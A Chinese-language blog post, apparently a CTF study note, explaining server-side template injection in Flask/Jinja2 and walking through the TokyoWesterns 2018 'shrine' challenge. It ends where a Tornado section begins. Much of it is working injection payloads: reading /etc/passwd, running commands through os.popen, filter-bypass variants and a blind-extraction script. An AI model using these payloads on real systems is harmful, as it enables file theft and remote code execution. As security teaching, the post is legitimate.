<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="web,">










<meta name="description" content="漏洞介绍什么是SSTI？SSTI即Server Side Template Injection，服务器端模板注入。由于程序员代码编写不当，信任了用户的输入，将其作为模板内容的一部分，从而造成模板可控。通过模板，我们可以通过输入转换成特定的html文件，返回给浏览器，比如说Twig模板： 1$output = $twig-&amp;gt;render( $_GET[‘custom_email’] , arr">
<meta name="keywords" content="web">
<meta property="og:type" content="article">
<meta property="og:title" content="SSTI模板注入">
<meta property="og:url" content="http://yoursite.com/2019/03/11/SSTI模板注入/index.html">
<meta property="og:site_name" content="Glarcy">
<meta property="og:description" content="漏洞介绍什么是SSTI？SSTI即Server Side Template Injection，服务器端模板注入。由于程序员代码编写不当，信任了用户的输入，将其作为模板内容的一部分，从而造成模板可控。通过模板，我们可以通过输入转换成特定的html文件，返回给浏览器，比如说Twig模板： 1$output = $twig-&amp;gt;render( $_GET[‘custom_email’] , arr">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://yoursite.com/img/ssti/flask1.jpg">
<meta property="og:image" content="http://yoursite.com/img/ssti/flask2.png">
<meta property="og:image" content="http://yoursite.com/img/ssti/t1.png">
<meta property="og:image" content="http://yoursite.com/img/ssti/t2.png">
<meta property="og:image" content="http://yoursite.com/img/ssti/t3.jpg">
<meta property="og:image" content="http://yoursite.com/img/ssti/t4.jpg">
<meta property="og:image" content="http://yoursite.com/img/ssti/t5.jpg">
<meta property="og:updated_time" content="2020-01-03T09:49:38.082Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SSTI模板注入">
<meta name="twitter:description" content="漏洞介绍什么是SSTI？SSTI即Server Side Template Injection，服务器端模板注入。由于程序员代码编写不当，信任了用户的输入，将其作为模板内容的一部分，从而造成模板可控。通过模板，我们可以通过输入转换成特定的html文件，返回给浏览器，比如说Twig模板： 1$output = $twig-&amp;gt;render( $_GET[‘custom_email’] , arr">
<meta name="twitter:image" content="http://yoursite.com/img/ssti/flask1.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/03/11/SSTI模板注入/">





  <title>SSTI模板注入 | Glarcy</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Glarcy</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-首页">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-关于">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-标签">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-分类">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-归档">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/03/11/SSTI模板注入/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Glarcy">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Glarcy">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SSTI模板注入</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-03-11T20:56:38+08:00">
                2019-03-11
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web/" itemprop="url" rel="index">
                    <span itemprop="name">web</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="漏洞介绍"><a href="#漏洞介绍" class="headerlink" title="漏洞介绍"></a>漏洞介绍</h3><p>什么是SSTI？SSTI即Server Side Template Injection，服务器端模板注入。由于程序员代码编写不当，信任了用户的输入，将其作为模板内容的一部分，从而造成模板可控。通过模板，我们可以通过输入转换成特定的html文件，返回给浏览器，比如说Twig模板：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$output = $twig-&gt;render( $_GET[‘custom_email’] , array(“first_name” =&gt; $user.first_name) );</span><br></pre></td></tr></table></figure>

<p>SSTI主要影响的框架有 python框架：jinja2、Tornado 、Django，php框架：Smarty、Twig，java框架：Jade、Velocity</p>
<a id="more"></a>

<h3 id="SSTI-in-flask"><a href="#SSTI-in-flask" class="headerlink" title="SSTI in flask"></a>SSTI in flask</h3><p>下面讲解一些关于flask的相关知识</p>
<h4 id="路由"><a href="#路由" class="headerlink" title="路由"></a>路由</h4><p>route装饰器的作用是将函数与url绑定起来，比如说有如下代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route('/')</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span><span class="params">()</span>:</span></span><br><span class="line">   <span class="keyword">return</span> <span class="string">"hello word"</span></span><br></pre></td></tr></table></figure>

<p>访问127.0.0.1:5000，会返回hello world</p>
<p>如果改一下，变成如下代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route('/test')</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span><span class="params">()</span>:</span></span><br><span class="line">   <span class="keyword">return</span> <span class="string">"hello word"</span></span><br></pre></td></tr></table></figure>

<p>则访问127.0.0.1:5000/index，会返回hello world</p>
<p>当然也可以是动态的，或者可以使用int型，转换器有下面几种：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">int    接受整数</span><br><span class="line">float    同 int ，但是接受浮点数</span><br><span class="line">path    和默认的相似，但也接受斜线</span><br><span class="line"></span><br><span class="line">@app.route(&quot;/hello/&lt;username&gt;&quot;)</span><br><span class="line">def hello_user(username):</span><br><span class="line">    return &quot;user:%s&quot;%username</span><br><span class="line">    </span><br><span class="line">@app.route(&apos;/post/&lt;int:post_id&gt;&apos;)</span><br><span class="line">def show_post(post_id):</span><br><span class="line">    return &apos;Post %d&apos; % post_id</span><br></pre></td></tr></table></figure>

<h4 id="渲染方法"><a href="#渲染方法" class="headerlink" title="渲染方法"></a>渲染方法</h4><p>flask中的模板渲染方法有两个：</p>
<ul>
<li><p>render_template</p>
</li>
<li><p>render_template_string</p>
</li>
</ul>
<p>render_template()是用来渲染一个指定的文件的，使用如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">return render_template(&apos;index.html&apos;)</span><br></pre></td></tr></table></figure>

<p>render_template_string则是用来渲染一个字符串的，使用如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">str = &apos;aaa&apos;</span><br><span class="line">return render_template_string(str)</span><br></pre></td></tr></table></figure>

<h4 id="模板渲染"><a href="#模板渲染" class="headerlink" title="模板渲染"></a>模板渲染</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">├── app.py  </span><br><span class="line">├── static  </span><br><span class="line">│   └── style.css  </span><br><span class="line">└── templates  </span><br><span class="line">    └── index.html</span><br></pre></td></tr></table></figure>

<p>flask是使用Jinja2来作为渲染引擎的，根目录下的templates目录是用来存放html的，也就是模板文件，render_template函数渲染的就是templates目录下的模板文件。但是模板文件并不是单纯的html代码，而是夹杂着模板的语法，因为页面不可能都是一个样子的，有一些地方是会变化的。比如说显示用户名的地方，这个时候就需要使用模板支持的语法，来传参，比如：</p>
<p>index.html</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">h1</span>&gt;</span>Hello, &#123;&#123;name&#125;&#125;!<span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>app.py</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route('/index')</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">user</span><span class="params">()</span>:</span></span><br><span class="line">	name = <span class="string">'Glarcy'</span></span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>,name = name)</span><br></pre></td></tr></table></figure>

<p>name参数经过渲染，访问页面时会出现Hello,Glarcy！</p>
<h4 id="攻击方法"><a href="#攻击方法" class="headerlink" title="攻击方法"></a>攻击方法</h4><h5 id="获取python的基本类"><a href="#获取python的基本类" class="headerlink" title="获取python的基本类"></a>获取python的基本类</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#python2.7</span></span><br><span class="line"><span class="string">''</span>.__class__.__mro__[<span class="number">2</span>]</span><br><span class="line">&#123;&#125;.__class__.__bases__[<span class="number">0</span>]</span><br><span class="line">().__class__.__bases__[<span class="number">0</span>]</span><br><span class="line">[].__class__.__bases__[<span class="number">0</span>]</span><br><span class="line">request.__class__.__mro__[<span class="number">8</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">#python3.7</span></span><br><span class="line"><span class="string">''</span>.__class__.__mro__[<span class="number">1</span>]</span><br><span class="line">&#123;&#125;.__class__.__bases__[<span class="number">0</span>]</span><br><span class="line">().__class__.__bases__[<span class="number">0</span>]</span><br><span class="line">[].__class__.__bases__[<span class="number">0</span>]</span><br><span class="line">request.__class__.__mro__[<span class="number">1</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">#可以借助__getitem__绕过中括号限制：</span></span><br><span class="line"></span><br><span class="line"><span class="string">''</span>.__class__.__mro__.__getitem__(<span class="number">2</span>)</span><br><span class="line">&#123;&#125;.__class__.__bases__.__getitem__(<span class="number">0</span>)</span><br><span class="line">().__class__.__bases__.__getitem__(<span class="number">0</span>)</span><br><span class="line">request.__class__.__mro__.__getitem__(<span class="number">8</span>)</span><br></pre></td></tr></table></figure>

<h5 id="文件操作"><a href="#文件操作" class="headerlink" title="文件操作"></a>文件操作</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#找到file类</span></span><br><span class="line">[].__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">40</span>]</span><br><span class="line"><span class="comment">#读文件</span></span><br><span class="line">[].__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">40</span>](<span class="string">'/etc/passwd'</span>).read()</span><br><span class="line"><span class="comment">#写文件</span></span><br><span class="line">[].__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">40</span>](<span class="string">'/tmp'</span>).write(<span class="string">'test'</span>)</span><br></pre></td></tr></table></figure>

<h5 id="执行命令"><a href="#执行命令" class="headerlink" title="执行命令"></a>执行命令</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#os类，可以直接执行命令</span></span><br><span class="line">[].__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">59</span>].__init__.func_globals.linecache.os.popen(<span class="string">'id'</span>).read()</span><br><span class="line"></span><br><span class="line"><span class="comment">#eval，__import__等的全局函数，可以利用此来执行命令：</span></span><br><span class="line">[].__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">59</span>].__init__.__globals__[<span class="string">'__builtins__'</span>][<span class="string">'eval'</span>](<span class="string">"__import__('os').popen('id').read()"</span>)</span><br><span class="line"></span><br><span class="line">[].__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">59</span>].__init__.__globals__.__builtins__.eval(<span class="string">"__import__('os').popen('id').read()"</span>)</span><br><span class="line"></span><br><span class="line">[].__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">59</span>].__init__.__globals__.__builtins__.__import__(<span class="string">'os'</span>).popen(<span class="string">'id'</span>).read()</span><br><span class="line"></span><br><span class="line">[].__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">59</span>].__init__.__globals__[<span class="string">'__builtins__'</span>][<span class="string">'__import__'</span>](<span class="string">'os'</span>).popen(<span class="string">'id'</span>).read()</span><br></pre></td></tr></table></figure>

<h5 id="Bypass"><a href="#Bypass" class="headerlink" title="Bypass"></a>Bypass</h5><ul>
<li><p>过滤关键字</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;session[<span class="string">'__cla'</span>+<span class="string">'ss__'</span>].__base__.__base__.__base__[<span class="string">'__subcla'</span>+<span class="string">'sses__'</span>]()[<span class="number">163</span>].__init__.__globals__[<span class="string">'__bui'</span>+<span class="string">'ltins__'</span>][<span class="string">'op'</span>+<span class="string">'en'</span>](<span class="string">'/flag'</span>).read()&#125;&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>过滤<code>[</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#读文件：</span></span><br><span class="line"><span class="string">''</span>.__class__.__mro__.__getitem__(<span class="number">2</span>).__subclasses__().pop(<span class="number">40</span>)(<span class="string">'/etc/passwd'</span>).read()</span><br><span class="line"></span><br><span class="line"><span class="comment">#执行命令：</span></span><br><span class="line"><span class="string">''</span>.__class__.__mro__.__getitem__(<span class="number">2</span>).__subclasses__().pop(<span class="number">59</span>).__init__.func_globals.linecache.os.popen(<span class="string">'ls'</span>).read()</span><br></pre></td></tr></table></figure>
</li>
<li><p>过滤引号</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#先获取chr函数，赋值给chr，后面拼接字符串就好了：</span></span><br><span class="line">&#123;% set chr=().__class__.__bases__.__getitem__(<span class="number">0</span>).__subclasses__()[<span class="number">59</span>].__init__.__globals__.__builtins__.chr %&#125;&#123;&#123; ().__class__.__bases__.__getitem__(<span class="number">0</span>).__subclasses__().pop(<span class="number">40</span>)(chr(<span class="number">47</span>)%<span class="number">2</span>bchr(<span class="number">101</span>)%<span class="number">2</span>bchr(<span class="number">116</span>)%<span class="number">2</span>bchr(<span class="number">99</span>)%<span class="number">2</span>bchr(<span class="number">47</span>)%<span class="number">2</span>bchr(<span class="number">112</span>)%<span class="number">2</span>bchr(<span class="number">97</span>)%<span class="number">2</span>bchr(<span class="number">115</span>)%<span class="number">2</span>bchr(<span class="number">115</span>)%<span class="number">2</span>bchr(<span class="number">119</span>)%<span class="number">2</span>bchr(<span class="number">100</span>)).read() &#125;&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">#借助request对象(推荐)：</span></span><br><span class="line">&#123;&#123; ().__class__.__bases__.__getitem__(<span class="number">0</span>).__subclasses__().pop(<span class="number">40</span>)(request.args.path).read() &#125;&#125;&amp;path=/etc/passwd</span><br><span class="line"></span><br><span class="line"><span class="comment">#执行命令：</span></span><br><span class="line">&#123;% set chr=().__class__.__bases__.__getitem__(<span class="number">0</span>).__subclasses__()[<span class="number">59</span>].__init__.__globals__.__builtins__.chr %&#125;&#123;&#123; ().__class__.__bases__.__getitem__(<span class="number">0</span>).__subclasses__().pop(<span class="number">59</span>).__init__.func_globals.linecache.os.popen(chr(<span class="number">105</span>)%<span class="number">2</span>bchr(<span class="number">100</span>)).read() &#125;&#125;</span><br><span class="line"></span><br><span class="line">&#123;&#123;().__class__.__bases__.__getitem__(<span class="number">0</span>).__subclasses__().pop(<span class="number">59</span>).__init__.func_globals.linecache.os.popen(request.args.cmd).read() &#125;&#125;&amp;cmd=id</span><br></pre></td></tr></table></figure>
</li>
<li><p>过滤双下划线<code>__</code></p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; ''[request.args.class][request.args.mro][2][request.args.subclasses]()[40]('/etc/passwd').read() &#125;&#125;&amp;class=__class__&amp;mro=__mro__&amp;subclasses=__subclasses__</span><br></pre></td></tr></table></figure>


</li>
</ul>
<p>  相当于盲命令执行，利用curl将执行结果带出来</p>
<p>  如果不能执行命令，读取文件可以利用盲注的方法逐位将内容爆出来</p>
  <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">'http://127.0.0.1:8080/'</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">check</span><span class="params">(payload)</span>:</span></span><br><span class="line">    postdata = &#123;</span><br><span class="line">        <span class="string">'exploit'</span>:payload</span><br><span class="line">        &#125;</span><br><span class="line">    r = requests.post(url, data=postdata).content</span><br><span class="line">    <span class="keyword">return</span> <span class="string">'~p0~'</span> <span class="keyword">in</span> r</span><br><span class="line"></span><br><span class="line">password  = <span class="string">''</span></span><br><span class="line">s = <span class="string">r'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"$\'()*+,-./:;&lt;=&gt;?@[\\]^`&#123;|&#125;~\'"_%'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> xrange(<span class="number">0</span>,<span class="number">100</span>):</span><br><span class="line">    <span class="keyword">for</span> c <span class="keyword">in</span> s:</span><br><span class="line">        payload = <span class="string">'&#123;% if "".__class__.__mro__[2].__subclasses__()[40]("/tmp/test").read()['</span>+str(i)+<span class="string">':'</span>+str(i+<span class="number">1</span>)+<span class="string">'] == "'</span>+c+<span class="string">'" %&#125;~p0~&#123;% endif %&#125;'</span></span><br><span class="line">        <span class="keyword">if</span> check(payload):</span><br><span class="line">            password += c</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">print</span> password</span><br><span class="line">    </span><br><span class="line"><span class="comment">#payload: &#123;% if "".__class__.__mro__[2].__subclasses__()[40]("/tmp/test").read()[0:1] == "0" %&#125;~p0~&#123;% endif %&#125;</span></span><br></pre></td></tr></table></figure>



<h4 id="动手实践"><a href="#动手实践" class="headerlink" title="动手实践"></a>动手实践</h4><p>例题：TokyoWesterns CTF 4th 2018 shrine</p>
<h5 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h5><p><a href="https://github.com/CTFTraining/westerns_2018_shrine" target="_blank" rel="noopener">https://github.com/CTFTraining/westerns_2018_shrine</a></p>
<p>由于我是在自己服务器上搭的，所以我修改了docker-compose.yml中的ports</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ports:</span><br><span class="line">      - &quot;0.0.0.0:your_port:5000&quot;</span><br></pre></td></tr></table></figure>

<p>进入目录启动</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker-compose up -d</span><br></pre></td></tr></table></figure>

<p>访问（比如说127.0.0.1:5000）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vps:your_port</span><br></pre></td></tr></table></figure>

<p>顺便提一句，这里的flag跟原题目的flag是不一样的，因为作了修改，如果你想更贴近题目你也可以在Dockerfile中修改</p>
<h5 id="攻击"><a href="#攻击" class="headerlink" title="攻击"></a>攻击</h5><p>进去可以直接看到源代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> flask</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">app = flask.Flask(__name__)</span><br><span class="line"></span><br><span class="line">app.config[<span class="string">'FLAG'</span>] = os.environ.pop(<span class="string">'FLAG'</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/')</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">return</span> open(__file__).read()</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/shrine/&lt;path:shrine&gt;')</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">shrine</span><span class="params">(shrine)</span>:</span></span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">safe_jinja</span><span class="params">(s)</span>:</span></span><br><span class="line">        s = s.replace(<span class="string">'('</span>, <span class="string">''</span>).replace(<span class="string">')'</span>, <span class="string">''</span>)</span><br><span class="line">        blacklist = [<span class="string">'config'</span>, <span class="string">'self'</span>]</span><br><span class="line">        <span class="keyword">return</span> <span class="string">''</span>.join([<span class="string">'&#123;&#123;% set &#123;&#125;=None%&#125;&#125;'</span>.format(c) <span class="keyword">for</span> c <span class="keyword">in</span> blacklist]) + s</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> flask.render_template_string(safe_jinja(shrine))</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    app.run(debug=<span class="literal">True</span>)</span><br></pre></td></tr></table></figure>

<p>从源代码可以看出</p>
<ul>
<li>()被过滤了，并且config、self被替换成了none</li>
<li>注入点为<code>/shrine/&lt; path:shrine &gt;</code>，即xxx.xxx.xxx.xxx/shrine/&#123;&#123;&#125;&#125;</li>
<li>初步探测，发现9被执行成功</li>
</ul>
<p><img src="../../../../img/ssti/flask1.jpg" alt></p>
<p>虽然self、config无法使用，但是我们可以使用__init__来列出所有的原始属性，即</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;app.__init__.__globals__.sys.modules.app.app.__dict__&#125;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="../../../../img/ssti/flask2.png" alt></p>
<p>除此之外，我看到别的师傅使用了调用current_app的办法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">url_for</span><br><span class="line">&#123;&#123;url_for.__globals__[&apos;current_app&apos;].config[&apos;FLAG&apos;]&#125;&#125;</span><br><span class="line"></span><br><span class="line">get_flashed_messages</span><br><span class="line">&#123;&#123;get_flashed_messages.__globals__[&apos;current_app&apos;].config[&apos;FLAG&apos;]&#125;&#125;</span><br></pre></td></tr></table></figure>

<h3 id="SSTI-in-tornado"><a href="#SSTI-in-tornado" class="headerlink" title="SSTI in tornado"></a>SSTI in tornado</h3><h4 id="动手实践-1"><a href="#动手实践-1" class="headerlink" title="动手实践"></a>动手实践</h4><p>例题：护网杯-easy_tornado</p>
<h5 id="环境搭建-1"><a href="#环境搭建-1" class="headerlink" title="环境搭建"></a>环境搭建</h5><p><a href="https://github.com/CTFTraining/huwangbei_2018_easy_tornado" target="_blank" rel="noopener">https://github.com/CTFTraining/huwangbei_2018_easy_tornado</a></p>
<p>vps上搭建，docker-compose.yml修改如下</p>
